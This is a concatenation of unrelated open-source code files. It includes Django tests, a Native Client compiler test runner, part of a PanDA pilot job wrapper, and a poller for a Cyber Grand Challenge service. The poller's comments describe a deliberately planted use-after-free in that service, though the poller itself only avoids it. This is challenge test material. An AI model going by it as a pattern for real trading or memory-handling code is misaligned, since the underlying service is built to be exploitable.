ox(getData(row, 'level_two_status')), print ox(getData(row, 'level_three_status')), print getData(row, 'challenge_points'),'=', print getData(row, 'final_points'),'pts', print getData(row,'old_rating'), print '->', print getData(row, 'new_rating'), print sys.exit(0)
nise-nabe/SRMResultGetter
srm_result.py
Python
bsd-2-clause
2,302
# -*- coding: utf-8 -*- # # This file is part of the VecNet OpenMalaria Portal. # For copyright and licensing information about this package, see the # NOTICE.txt and LICENSE.txt files in its top-level directory; they are # available at https://github.com/vecnet/om # # This Source Code Form is subject to the terms of the Mozilla Public # License (MPL), version 2.0. If a copy of the MPL was not distributed # with this file, You can obtain one at http://mozilla.org/MPL/2.0/. from django.test.testcases import TestCase from website.apps.ts_om.models import Simulation from website.apps.ts_om.tests.factories import ScenarioFactory, get_xml class ScenarioTest(TestCase): def test_demography_property_1(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) self.assertEqual(scenario.demography.name, "Tororo") def test_demography_property_2(self): scenario = ScenarioFactory(xml="xml") self.assertEqual(scenario.demography, "no_name") def test_output_file_property_1(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) self.assertEqual(scenario.output_file, None) def test_output_file_property_2(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) scenario.new_simulation = Simulation.objects.create() scenario.save() self.assertEqual(scenario.output_file, None) def test_output_file_property_3(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) scenario.new_simulation = Simulation.objects.create() scenario.save() scenario.new_simulation.set_model_stdout("123") self.assertEqual(scenario.output_file.read(), b"123")
vecnet/om
website/apps/ts_om/tests/models/test_Scenario.py
Python
mpl-2.0
1,702
#!/usr/bin/python # Copyright (c) 2013 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. ''' Installs and runs (a subset of) the gcc toolchain test suite against various nacl and non-nacl toolchains ''' import glob import os import os.path import sys # Hack to get buildbot_lib. Fix by moving scripts around? sys.path.append(os.path.abspath(os.path.join(os.getcwd(),'buildbot'))) import buildbot_lib # Config TEST_SUITE_BASE = os.path.join('toolchain_build', 'src', 'pnacl-gcc', 'gcc', 'testsuite') TEST_PATH_C = os.path.join(TEST_SUITE_BASE, 'gcc.c-torture', 'execute') TEST_PATH_CPP = os.path.join(TEST_SUITE_BASE, 'g++.dg') def usage(): print 'Usage:', sys.argv[0], '<compiler> <platform>', print '[<args for toolchain_tester.py>]' def list_tests(src_base, *glob_path): if not os.path.isdir(src_base): raise Exception('Torture test source directory missing: ' + src_base) glob_pattern = os.path.join(src_base, *glob_path) test_list = glob.glob(glob_pattern) if not test_list: raise Exception('Empty result list from glob pattern: ' + glob_pattern) return test_list def standard_tests(context, config, exclude, extra_args): # TODO: make toolchain_tester.py runnable as a library? command = ['tools/toolchain_tester/toolchain_tester.py', '--exclude=tools/toolchain_tester/' + exclude, '--exclude=tools/toolchain_tester/known_failures_base.txt', '--config=' + config, '--append=CFLAGS:-std=gnu89'] if 'pnacl' in config: command.append('--append_file=tools/toolchain_tester/extra_flags_pnacl.txt') command.extend(extra_args) command.extend(list_tests(TEST_PATH_C, '*c')) command.extend(list_tests(TEST_PATH_C, 'ieee', '*c')) print command try: return buildbot_lib.Command(context, command) except buildbot_lib.StepFailed: return 1 def eh_tests(context, config, exclude, extra_args, use_sjlj_eh): # TODO: toolchain_tester.py runnable as a library? command = ['tools/toolchain_tester/toolchain_tester.py', '--exclude=tools/toolchain_tester/' + exclude, '--exclude=tools/toolchain_tester/unsuitable_dejagnu_tests.txt', '--config=' + config] if 'pnacl' in config: command.append('--append_file=tools/toolchain_tester/extra_flags_pnacl.txt') if use_sjlj_eh: command.append('--append=CFLAGS:--pnacl-exceptions=sjlj') else: command.append('--append=CFLAGS:--pnacl-allow-exceptions') command.append('--append=FINALIZE_FLAGS:--no-finalize') command.append('--append=TRANSLATE_FLAGS:--pnacl-allow-exceptions') command.append('--append=TRANSLATE_FLAGS:--allow-llvm-bitcode-input') command.extend(extra_args) command.extend(list_tests(TEST_PATH_CPP, 'eh', '*.C')) print command try: return buildbot_lib.Command(context, command) except buildbot_lib.StepFailed: return 1 def run_torture(status, compiler, platform, extra_args): if platform not in ('x86-32', 'x86-64', 'arm'): print 'Unknown platform:', platform config_map = { 'pnacl': 'llvm_pnacl', 'naclgcc': 'nacl_gcc', 'localgcc': 'local_gcc', 'clang': 'nacl_clang'} failures = [] if compiler == 'pnacl': # O3_O0 is clang -O3 followed by pnacl-translate -O0 optmodes = ['O0', 'O3', 'O0_O0', 'O3_O0'] if platform == 'x86-32': # Add some extra Subzero configurations. optmodes.extend(['O3_sz', 'O3_O0_sz']) # TODO(stichnot): Consider pruning some configurations if the tests run # too long. else: optmodes = ['O0', 'O3'] for optmode in optmodes: # TODO: support an option like -k? For now, always keep going config = '_'.join((config_map[compiler], platform, optmode)) eh_config = ('_'.join((config_map[compiler] + '++', platform, optmode)) if compiler =='clang' else config) # Test zero-cost C++ exception handling. retcode = eh_tests(status.context, eh_config, 'known_eh_failures_' + compiler + '.txt', extra_args, use_sjlj_eh=False) if retcode: failures.append(optmode + ' zerocost eh') # Test SJLJ C++ exception handling. if compiler == 'pnacl': retcode = eh_tests(status.context, eh_config, 'known_eh_failures_' + compiler + '.txt', extra_args, use_sjlj_eh=True) if retcode: failures.append(optmode + ' sjlj eh') # Run the normal (non-exception-handling) tests. retcode = standard_tests( status.context, config, 'known_failures_' + compiler + '.txt', extra_args) if retcode: failures.append(optmode + ' standard') if len(failures) > 0: print 'There were failed steps in modes:', failures return 1 return 0 def main(): context = buildbot_lib.BuildContext() buildbot_lib.SetDefaultContextAttributes(context) context['max_jobs'] = int(os.environ.get('PNACL_CONCURRENCY', 4)) status = buildbot_lib.BuildStatus(context) # TODO(dschuff): it's a pain to pass through unknown arguments with optparse, # but if we add more, or once we have argparse (python2.7) everywhere, switch. try: compiler = sys.argv[1] platform = sys.argv[2] tester_argv = sys.argv[3:] except IndexError: usage() sys.exit(1) return run_torture(status, compiler, platform, tester_argv) if __name__ == '__main__': sys.exit(main())
cohortfsllc/cohort-cocl2-sandbox
tools/toolchain_tester/torture_test.py
Python
bsd-3-clause
5,564
#!/usr/bin/env python # # Copyright (C) 2014 Narf Industries <[email protected]> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY # CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # from generator.actions import Actions from random import choice, randint from os.path import dirname, abspath, join import string import struct import sys sys.path.append(join(dirname(dirname(dirname(abspath(__file__)))), "support")) from support import Support def random_alpha(a, b): return ''.join(choice(string.letters) for _ in range(randint(a, b))) class FalseProfits(Actions): SUCCESS = '\x00' * 4 FAILURE = '\xff' * 4 def start(self): self.state['model'] = Support() self.state['uaf'] = False def cmd(self): pass def list_stocks(self): stocks = self.state['model'].list_stocks() self.write(self.state['model'].make_list_stocks_cmd()) # After UAF, this list will be corrupted, so expect failure if self.state['uaf']: self.read(length=4, expect=self.FAILURE) else: for s in stocks: self.read(delim='\n', expect=s) self.read(length=4, expect=self.SUCCESS) def list_orders(self): pass def list_orders_valid(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = choice(stocks) orders = self.state['model'].list_orders(stock) self.write(self.state['model'].make_list_orders_cmd(stock)) self.read(delim='\n', expect='Order book for %s' % stock) self.read(delim='\n', expect='ID\tSIDE\tQTY\tPRICE\tQTY\tSIDE') for o in orders: self.read(delim='\n', expect=str(o)) self.read(length=4, expect=self.SUCCESS) def list_orders_invalid(self): stocks = self.state['model'].list_stocks() stock = random_alpha(1, 4) while stock in stocks: stock = random_alpha(1, 4) self.write(self.state['model'].make_list_orders_cmd(stock)) self.read(length=4, expect=self.FAILURE) def add_order(self): pass def add_order_existing(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = choice(list(stocks)) price = randint(1, 20) * 100 quantity = randint(1, 100) is_buy = choice((True, False)) order, removed = self.state['model'].place_order(stock, price, quantity, is_buy) self.write(self.state['model'].make_place_order_cmd(stock, price, quantity, is_buy)) self.read(length=4, expect=struct.pack('I', order)) # Prevent hitting UAF by force-allocating new stock, only corrupting one list if removed: self.state['uaf'] = True self.add_order_new() def add_order_new(self): stocks = self.state['model'].list_stocks() stock = random_alpha(1, 4) while stock in stocks: stock = random_alpha(1, 4) price = randint(1, 20) * 100 quantity = randint(1, 100) is_buy = choice((True, False)) order, removed = self.state['model'].place_order(stock, price, quantity, is_buy) assert(not removed) self.write(self.state['model'].make_place_order_cmd(stock, price, quantity, is_buy)) self.read(length=4, expect=struct.pack('I', order)) def check_order(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = self.state['model'].stock_dict[choice(stocks)] orders = stock.buy_orders + stock.sell_orders if not orders: return order = choice(orders).id_ self.write(self.state['model'].make_check_order_cmd(order)) self.read(delim='\n', expect=self.state['model'].check_order(order)) self.read(length=4, expect=self.SUCCESS) def cancel_order(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = self.state['model'].stock_dict[choice(stocks)] orders = stock.buy_orders + stock.sell_orders if not orders: return order = choice(orders).id_ removed = self.state['model'].cancel_order(order) self.write(self.state['model'].make_cancel_order_cmd(order)) self.read(length=4, expect=self.SUCCESS) # Prevent hitting UAF by force-allocating new stock if removed: self.state['uaf'] = True self.add_order_new() def finish(self): self.write(self.state['model'].make_quit_cmd())
f0rki/cb-multios
original-challenges/electronictrading/poller/for-release/machine.py
Python
mit
5,603
match x<caret>:
jwren/intellij-community
python/testData/codeInsight/smartEnter/firstClauseAfterEmptyMatchStatementWithSubjectAndColon.py
Python
apache-2.0
15
# Class definition: # RunJob # This is the main RunJob class; RunJobEvent etc will inherit from this class # Note: at the moment, this class is essentially the old runJob module turned object oriented. # The class will later become RunJobNormal, ie responible for running normal PanDA jobs. # At that point a new RunJob top class will be created containing methods that have been # identified as common between the various sub classes. # Instances are generated with RunJobFactory # Subclasses should implement all needed methods prototyped in this class # Note: not compatible with Singleton Design Pattern due to the subclassing # Standard python modules import os, sys, commands, getopt, time import traceback import atexit, signal import stat from optparse import OptionParser # Pilot modules import Site, pUtil, Job, Node, RunJobUtilities import Mover as mover from pUtil import debugInfo, tolog, isAnalysisJob, readpar, createLockFile, getDatasetDict, getChecksumCommand,\ tailPilotErrorDiag, getFileAccessInfo, processDBRelease, getCmtconfig, getExtension, getExperiment, getGUID, dumpFile from JobRecovery import JobRecovery from FileStateClient import updateFileStates, dumpFileStates from ErrorDiagnosis import ErrorDiagnosis # import here to avoid issues seen at BU with missing module from PilotErrors import PilotErrors from ProxyGuard import ProxyGuard from shutil import copy2 from FileHandling import tail # remove logguid, dq2url, debuglevel - not needed # rename lfcRegistration to catalogRegistration # relabelled -h, queuename to -b (debuglevel not used) class RunJob(object): # private data members __runjob = "RunJob" # String defining the RunJob class __instance = None # Boolean used by subclasses to become a Singleton __error = PilotErrors() # PilotErrors object # __appdir = "/usatlas/projects/OSG" # Default software installation directory # __debugLevel = 0 # 0: debug info off, 1: display function name when called, 2: full debug info # __dq2url = "" # REMOVE __failureCode = None # set by signal handler when user/batch system kills the job __globalPilotErrorDiag = "" # global pilotErrorDiag used with signal handler (only) __globalErrorCode = 0 # global error code used with signal handler (only) __inputDir = "" # location of input files (source for mv site mover) __fileCatalogRegistration = True # should the pilot perform file catalog registration? __logguid = None # guid for the log file __outputDir = "" # location of output files (destination for mv site mover) __pilot_initdir = "" # location of where the pilot is untarred and started __pilotlogfilename = "pilotlog.txt" # default pilotlog filename __pilotserver = "localhost" # default server __pilotport = 88888 # default port __proxycheckFlag = True # True (default): perform proxy validity checks, False: no check __pworkdir = "/tmp" # site work dir used by the parent # __queuename = "" # PanDA queue NOT NEEDED # __sitename = "testsite" # PanDA site NOT NEEDED __stageinretry = 1 # number of stage-in tries __stageoutretry = 1 # number of stage-out tries # __testLevel = 0 # test suite control variable (0: no test, 1: put error, 2: ...) NOT USED # __workdir = "/tmp" # NOT USED __cache = "" # Cache URL, e.g. used by LSST # Getter and setter methods def getExperiment(self): """ Getter for __experiment """ return self.__experiment def getFailureCode(self): """ Getter for __failureCode """ return self.__failureCode def setFailureCode(self, code): """ Setter for __failureCode """ self.__failureCode = code def getGlobalPilotErrorDiag(self): """ Getter for __globalPilotErrorDiag """ return self.__globalPilotErrorDiag def setGlobalPilotErrorDiag(self, pilotErrorDiag): """ Setter for __globalPilotErrorDiag """ self.__globalPilotErrorDiag = pilotErrorDiag def getGlobalErrorCode(self): """ Getter for __globalErrorCode """ return self.__globalErrorCode def setGlobalErrorCode(self, code): """ Setter for __globalErrorCode """ self.__globalErrorCode = code def setCache(self, cache): """ Setter for __cache """ self.__cache = cache def getInputDir(self): """ Getter for __inputDir """ return self.__inputDir def getFileCatalogRegistration(self): """ Getter for __fileCatalogRegistration """ return self.__fileCatalogRegistration def getLogGUID(self): """ Getter for __logguid """ return self.__logguid def getOutputDir(self): """ Getter for __outputDir """ return self.__outputDir def getPilotInitDir(self): """ Getter for __pilot_initdir """ return self.__pilot_initdir def getPilotLogFilename(self): """ Getter for __pilotlogfilename """ return self.__pilotlogfilename def getPilotServer(self): """ Getter for __pilotserver """ return self.__pilotserver def getPilotPort(self): """ Getter for __pilotport """ return self.__pilotport def getProxyCheckFlag(self): """ Getter for __proxycheckFlag """ return self.__proxycheckFlag def getParentWorkDir(self): """ Getter for __pworkdir """ return self.__pworkdir def getStageInRetry(self): """ Getter for __stageinretry """ return self.__stageinretry def getStageOutRetry(self): """ Getter for __stageoutretry """ return self.__stageoutretry def getCache(self): """ Getter for __cache """ return self.__cache # Required methods def __init__(self): """ Default initialization """ # e.g. self.__errorLabel = errorLabel pass def getRunJob(self): """ Return a string with the module name """ return self.__runjob def argumentParser(self): """ Argument parser for the RunJob module """ # Return variables appdir = None dq2url = None # REMOVE queuename = None sitename = None workdir = None parser = OptionParser() parser.add_option("-a", "--appdir", dest="appdir", help="The local path to the applications directory", metavar="APPDIR") parser.add_option("-b", "--queuename", dest="queuename", help="Queue name", metavar="QUEUENAME") parser.add_option("-d", "--workdir", dest="workdir", help="The local path to the working directory of the payload", metavar="WORKDIR") parser.add_option("-g", "--inputdir", dest="inputDir", help="Location of input files to be transferred by the mv site mover", metavar="INPUTDIR") parser.add_option("-i", "--logfileguid", dest="logguid", help="Log file guid", metavar="GUID") parser.add_option("-k", "--pilotlogfilename", dest="pilotlogfilename", help="The name of the pilot log file", metavar="PILOTLOGFILENAME") parser.add_option("-l", "--pilotinitdir", dest="pilot_initdir", help="The local path to the directory where the pilot was launched", metavar="PILOT_INITDIR") parser.add_option("-m", "--outputdir", dest="outputDir", help="Destination of output files to be transferred by the mv site mover", metavar="OUTPUTDIR") parser.add_option("-o", "--parentworkdir", dest="pworkdir", help="Path to the work directory of the parent process (i.e. the pilot)", metavar="PWORKDIR") parser.add_option("-s", "--sitename", dest="sitename", help="The name of the site where the job is to be run", metavar="SITENAME") parser.add_option("-w", "--pilotserver", dest="pilotserver", help="The URL of the pilot TCP server (localhost) WILL BE RETIRED", metavar="PILOTSERVER") parser.add_option("-p", "--pilotport", dest="pilotport", help="Pilot TCP server port (default: 88888)", metavar="PORT") parser.add_option("-t", "--proxycheckflag", dest="proxycheckFlag", help="True (default): perform proxy validity checks, False: no check", metavar="PROXYCHECKFLAG") parser.add_option("-q", "--dq2url", dest="dq2url", help="DQ2 URL TO BE RETIRED", metavar="DQ2URL") parser.add_option("-x", "--stageinretries", dest="stageinretry", help="The number of stage-in retries", metavar="STAGEINRETRY") parser.add_option("-B", "--filecatalogregistration", dest="fileCatalogRegistration", help="True (default): perform file catalog registration, False: no catalog registration", metavar="FILECATALOGREGISTRATION") parser.add_option("-E", "--stageoutretries", dest="stageoutretry", help="The number of stage-out retries", metavar="STAGEOUTRETRY") parser.add_option("-F", "--experiment", dest="experiment", help="Current experiment (default: ATLAS)", metavar="EXPERIMENT") parser.add_option("-H", "--cache", dest="cache", help="Cache URL", metavar="CACHE") # options = {'experiment': 'ATLAS'} try: (options, args) = parser.parse_args() except Exception,e: tolog("!!WARNING!!3333!! Exception caught:" % (e)) print options.experiment else: if options.appdir: # self.__appdir = options.appdir appdir = options.appdir if options.dq2url: # self.__dq2url = options.dq2url dq2url = options.dq2url if options.experiment: self.__experiment = options.experiment if options.logguid: self.__logguid = options.logguid if options.inputDir: self.__inputDir = options.inputDir if options.fileCatalogRegistration: if options.fileCatalogRegistration.lower() == "false": self.__fileCatalogRegistration = False else: self.__fileCatalogRegistration = True else: self.__fileCatalogRegistration = True if options.pilot_initdir: self.__pilot_initdir = options.pilot_initdir if options.pilotlogfilename: self.__pilotlogfilename = options.pilotlogfilename if options.pilotserver: self.__pilotserver = options.pilotserver if options.proxycheckFlag: if options.proxycheckFlag.lower() == "false": self.__proxycheckFlag = False else: self.__proxycheckFlag = True else: self.__proxycheckFlag = True if options.pworkdir: self.__pworkdir = options.pworkdir if options.outputDir: self.__outputDir = options.outputDir if options.pilotport: try: self.__pilotport = int(options.pilotport) except Exception, e: tolog("!!WARNING!!3232!! Exception caught: %s" % (e)) # self.__queuename is not needed if options.queuename: queuename = options.queuename if options.sitename: sitename = options.sitename if options.stageinretry: try: self.__stageinretry = int(options.stageinretry) except Exception, e: tolog("!!WARNING!!3232!! Exception caught: %s" % (e)) if options.stageoutretry: try: self.__stageoutretry = int(options.stageoutretry) except Exception, e: tolog("!!WARNING!!3232!! Exception caught: %s" % (e)) if options.workdir: workdir = options.workdir if options.cache: self.__cache = options.cache return sitename, appdir, workdir, dq2url, queuename def getRunJobFileName(self): """ Return the filename of the module """ fullpath = sys.modules[self.__module__].__file__ # Note: the filename above will contain both full path, and might end with .pyc, fix this filename = os.path.basename(fullpath) if filename.endswith(".pyc"): filename = filename[:-1] # remove the trailing 'c' return filename def allowLoopingJobKiller(self): """ Should the pilot search for looping jobs? """ # The pilot has the ability to monitor the payload work directory. If there are no updated files within a certain # time limit, the pilot will consider the as stuck (looping) and will kill it. The looping time limits are set # in environment.py (see e.g. loopingLimitDefaultProd) return True def cleanup(self, job, rf=None): """ Cleanup function """ # 'rf' is a list that will contain the names of the files that could be transferred # In case of transfer problems, all remaining files will be found and moved # to the data directory for later recovery. tolog("********************************************************") tolog(" This job ended with (trf,pilot) exit code of (%d,%d)" % (job.result[1], job.result[2])) tolog("********************************************************") # clean up the pilot wrapper modules pUtil.removePyModules(job.workdir) if os.path.isdir(job.workdir): os.chdir(job.workdir) # remove input files from the job workdir remFiles = job.inFiles for inf in remFiles: if inf and inf != 'NULL' and os.path.isfile("%s/%s" % (job.workdir, inf)): # non-empty string and not NULL try: os.remove("%s/%s" % (job.workdir, inf)) except Exception,e: tolog("!!WARNING!!3000!! Ignore this Exception when deleting file %s: %s" % (inf, str(e))) pass # only remove output files if status is not 'holding' # in which case the files should be saved for the job recovery. # the job itself must also have finished with a zero trf error code # (data will be moved to another directory to keep it out of the log file) # always copy the metadata-<jobId>.xml to the site work dir # WARNING: this metadata file might contain info about files that were not successfully moved to the SE # it will be regenerated by the job recovery for the cases where there are output files in the datadir try: tolog('job.workdir is %s pworkdir is %s ' % (job.workdir, self.__pworkdir)) # Eddie copy2("%s/metadata-%s.xml" % (job.workdir, job.jobId), "%s/metadata-%s.xml" % (self.__pworkdir, job.jobId)) except Exception, e: tolog("Warning: Could not copy metadata-%s.xml to site work dir - ddm Adder problems will occure in case of job recovery" % (job.jobId)) tolog('job.workdir is %s pworkdir is %s ' % (job.workdir, self.__pworkdir)) # Eddie if job.result[0] == 'holding' and job.result[1] == 0: try: # create the data directory os.makedirs(job.datadir) except OSError, e: tolog("!!WARNING!!3000!! Could not create data directory: %s, %s" % (job.datadir, str(e))) else: # find all remaining files in case 'rf' is not empty remaining_files = [] moved_files_list = [] try: if rf != None: moved_files_list = RunJobUtilities.getFileNamesFromString(rf[1]) remaining_files = RunJobUtilities.getRemainingFiles(moved_files_list, job.outFiles) except Exception, e: tolog("!!WARNING!!3000!! Illegal return value from Mover: %s, %s" % (str(rf), str(e))) remaining_files = job.outFiles # move all remaining output files to the data directory nr_moved = 0 for _file in remaining_files: try: os.system("mv %s %s" % (_file, job.datadir)) except OSError, e: tolog("!!WARNING!!3000!! Failed to move file %s (abort all)" % (_file)) break else: nr_moved += 1 tolog("Moved %d/%d output file(s) to: %s" % (nr_moved, len(remaining_files), job.datadir)) # remove all successfully copied files from the local directory nr_removed = 0 for _file in moved_files_list: try: os.system("rm %s" % (_file)) except OSError, e: tolog("!!WARNING!!3000!! Failed to remove output file: %s, %s" % (_file, e)) else: nr_removed += 1 tolog("Removed %d output file(s) from local dir" % (nr_removed)) # copy the PoolFileCatalog.xml for non build jobs if not pUtil.isBuildJob(remaining_files): _fname = os.path.join(job.workdir, "PoolFileCatalog.xml") tolog("Copying %s to %s" % (_fname, job.datadir)) try: copy2(_fname, job.datadir) except Exception, e: tolog("!!WARNING!!3000!! Could not copy PoolFileCatalog.xml to data dir - expect ddm Adder problems during job recovery") # remove all remaining output files from the work directory # (a successfully copied file should already have been removed by the Mover) rem = False for inf in job.outFiles: if inf and inf != 'NULL' and os.path.isfile("%s/%s" % (job.workdir, inf)): # non-empty string and not NULL try: os.remove("%s/%s" % (job.workdir, inf)) except Exception,e: tolog("!!WARNING!!3000!! Ignore this Exception when deleting file %s: %s" % (inf, str(e))) pass else: tolog("Lingering output file removed: %s" % (inf)) rem = True if not rem: tolog("All output files already removed from local dir") tolog("Payload cleanup has finished") def sysExit(self, job, rf=None): ''' wrapper around sys.exit rs is the return string from Mover::put containing a list of files that were not transferred ''' self.cleanup(job, rf=rf) sys.stderr.close() tolog("RunJob (payload wrapper) has finished") # change to sys.exit? os._exit(job.result[2]) # pilotExitCode, don't confuse this with the overall pilot exit code, # which doesn't get reported back to panda server anyway def failJob(self, transExitCode, pilotExitCode, job, ins=None, pilotErrorDiag=None, docleanup=True): """ set the fail code and exit """ if pilotExitCode and job.attemptNr < 4 and job.eventServiceMerge: pilotExitCode = PilotErrors.ERR_ESRECOVERABLE job.setState(["failed", transExitCode, pilotExitCode]) if pilotErrorDiag: job.pilotErrorDiag = pilotErrorDiag tolog("Will now update local pilot TCP server") rt = RunJobUtilities.updatePilotServer(job, self.__pilotserver, self.__pilotport, final=True) if ins: ec = pUtil.removeFiles(job.workdir, ins) if docleanup: self.sysExit(job) def isMultiTrf(self, parameterList): """ Will we execute multiple jobs? """ if len(parameterList) > 1: multi_trf = True else: multi_trf = False return multi_trf def setup(self, job, jobSite, thisExperiment): """ prepare the setup and get the run command list """ # start setup time counter t0 = time.time() ec = 0 runCommandList = [] # split up the job parameters to be able to loop over the tasks jobParameterList = job.jobPars.split("\n") jobHomePackageList = job.homePackage.split("\n") jobTrfList = job.trf.split("\n") job.release = thisExperiment.formatReleaseString(job.release) releaseList = thisExperiment.getRelease(job.release) tolog("Number of transformations to process: %s" % len(jobParameterList)) multi_trf = self.isMultiTrf(jobParameterList) # verify that the multi-trf job is setup properly ec, job.pilotErrorDiag, releaseList = RunJobUtilities.verifyMultiTrf(jobParameterList, jobHomePackageList, jobTrfList, releaseList) if ec > 0: return ec, runCommandList, job, multi_trf os.chdir(jobSite.workdir) tolog("Current job workdir is %s" % os.getcwd()) # setup the trf(s) _i = 0 _stdout = job.stdout _stderr = job.stderr _first = True for (_jobPars, _homepackage, _trf, _swRelease) in map(None, jobParameterList, jobHomePackageList, jobTrfList, releaseList): tolog("Preparing setup %d/%d" % (_i + 1, len(jobParameterList))) # reset variables job.jobPars = _jobPars job.homePackage = _homepackage job.trf = _trf job.release = _swRelease if multi_trf: job.stdout = _stdout.replace(".txt", "_%d.txt" % (_i + 1)) job.stderr = _stderr.replace(".txt", "_%d.txt" % (_i + 1)) # post process copysetup variable in case of directIn/useFileStager _copysetup = readpar('copysetup') _copysetupin = readpar('copysetupin') if "--directIn" in job.jobPars or "--useFileStager" in job.jobPars or _copysetup.count('^') == 5 or _copysetupin.count('^') == 5: # only need to update the queuedata file once if _first: RunJobUtilities.updateCopysetups(job.jobPars) _first = False # setup the trf ec, job.pilotErrorDiag, cmd, job.spsetup, job.JEM, job.cmtconfig = thisExperiment.getJobExecutionCommand(job, jobSite, self.__pilot_initdir) if ec > 0: # setup failed break # add the setup command to the command list runCommandList.append(cmd) _i += 1 job.stdout = _stdout job.stderr = _stderr job.timeSetup = int(time.time() - t0) tolog("Total setup time: %d s" % (job.timeSetup)) return ec, runCommandList, job, multi_trf def stageIn(self, job, jobSite, analysisJob, pfc_name="PoolFileCatalog.xml"): """ Perform the stage-in """ ec = 0 statusPFCTurl = None usedFAXandDirectIO = False # Prepare the input files (remove non-valid names) if there are any ins, job.filesizeIn, job.checksumIn = RunJobUtilities.prepareInFiles(job.inFiles, job.filesizeIn, job.checksumIn) if ins: tolog("Preparing for get command") # Get the file access info (only useCT is needed here) useCT, oldPrefix, newPrefix, useFileStager, directIn = getFileAccessInfo() # Transfer input files tin_0 = os.times() ec, job.pilotErrorDiag, statusPFCTurl, FAX_dictionary = \ mover.get_data(job, jobSite, ins, self.__stageinretry, analysisJob=analysisJob, usect=useCT,\ pinitdir=self.__pilot_initdir, proxycheck=False, inputDir=self.__inputDir, workDir=self.__pworkdir, pfc_name=pfc_name) if ec != 0: job.result[2] = ec tin_1 = os.times() job.timeStageIn = int(round(tin_1[4] - tin_0[4])) # Extract any FAX info from the dictionary if FAX_dictionary.has_key('N_filesWithoutFAX'): job.filesWithoutFAX = FAX_dictionary['N_filesWithoutFAX'] if FAX_dictionary.has_key('N_filesWithFAX'): job.filesWithFAX = FAX_dictionary['N_filesWithFAX'] if FAX_dictionary.has_key('bytesWithoutFAX'): job.bytesWithoutFAX = FAX_dictionary['bytesWithoutFAX'] if FAX_dictionary.has_key('bytesWithFAX'): job.bytesWithFAX = FAX_dictionary['bytesWithFAX'] if FAX_dictionary.has_key('usedFAXandDirectIO'): usedFAXandDirectIO = FAX_dictionary['usedFAXandDirectIO'] return job, ins, statusPFCTurl, usedFAXandDirectIO def getTrfExitInfo(self, exitCode, workdir): """ Get the trf exit code and info from job report if possible """ exitAcronym = "" exitMsg = "" # does the job report exist? extension = getExtension(alternative='pickle') if extension.lower() == "json": _filename = "jobReport.%s" % (extension) else: _filename = "jobReportExtract.%s" % (extension) filename = os.path.join(workdir, _filename) if os.path.exists(filename): tolog("Found job report: %s" % (filename)) # wait a few seconds to make sure the job report is finished tolog("Taking a 5s nap to make sure the job report is finished") time.sleep(5) # first backup the jobReport to the job workdir since it will be needed later # (the current location will disappear since it will be tarred up in the jobs' log file) d = os.path.join(workdir, '..') try: copy2(filename, os.path.join(d, _filename)) except Exception, e: tolog("Warning: Could not backup %s to %s: %s" % (_filename, d, e)) else: tolog("Backed up %s to %s" % (_filename, d)) # search for the exit code try: f = open(filename, "r") except Exception, e: tolog("!!WARNING!!1112!! Failed to open job report: %s" % (e)) else: if extension.lower() == "json": from json import load else: from pickle import load data = load(f) # extract the exit code and info _exitCode = self.extractDictionaryObject("exitCode", data) if _exitCode: if _exitCode == 0 and exitCode != 0: tolog("!!WARNING!!1111!! Detected inconsistency in %s: exitcode listed as 0 but original trf exit code was %d (using original error code)" %\ (filename, exitCode)) else: exitCode = _exitCode _exitAcronym = self.extractDictionaryObject("exitAcronym", data) if _exitAcronym: exitAcronym = _exitAcronym _exitMsg = self.extractDictionaryObject("exitMsg", data) if _exitMsg: exitMsg = _exitMsg f.close() tolog("Trf exited with:") tolog("...exitCode=%d" % (exitCode)) tolog("...exitAcronym=%s" % (exitAcronym)) tolog("...exitMsg=%s" % (exitMsg)) else: tolog("Job report not found: %s" % (filename)) return exitCode, exitAcronym, exitMsg def extractDictionaryObject(self, obj, dictionary): """ Extract an object from a dictionary """ _obj = None try: _obj = dictionary[obj] except Exception, e: tolog("Object %s not found in dictionary" % (obj)) else: tolog('Extracted \"%s\"=%s from dictionary' % (obj, _obj)) return _obj def getMemoryUtilityCommand(self, pid, summary="summary.json"): """ Prepare the memory utility command string """ interval = 60 path = "/afs/cern.ch/work/n/nrauschm/public/MemoryMonitoringTool/MemoryMonitor" cmd = "" try: tolog("2. Process id of job command: %d" % (pid)) except Exception, e: tolog("Exception caught: %s" % (e)) # Construct the name of the output file using the summary variable if summary.endswith('.json'): output = summary.replace('.json', '.txt') else: output = summary + '.txt' if os.path.exists(path): cmd = "%s --pid %d --filename %s --json-summary %s --interval %d" % (path, pid, output, summary, interval) else: tolog("Path does not exist: %s" % (path)) return cmd def executePayload(self, thisExperiment, runCommandList, job): """ execute the payload """ # do not hide the proxy for PandaMover since it needs it or for sites that has sc.proxy = donothide # if 'DDM' not in jobSite.sitename and readpar('proxy') != 'donothide': # # create the proxy guard object (must be created here before the sig2exc()) # proxyguard = ProxyGuard() # # # hide the proxy # hP_ret = proxyguard.hideProxy() # if not hP_ret: # tolog("Warning: Proxy exposed to payload") # run the payload process, which could take days to finish t0 = os.times() tolog("t0 = %s" % str(t0)) res_tuple = (0, 'Undefined') multi_trf = self.isMultiTrf(runCommandList) _stdout = 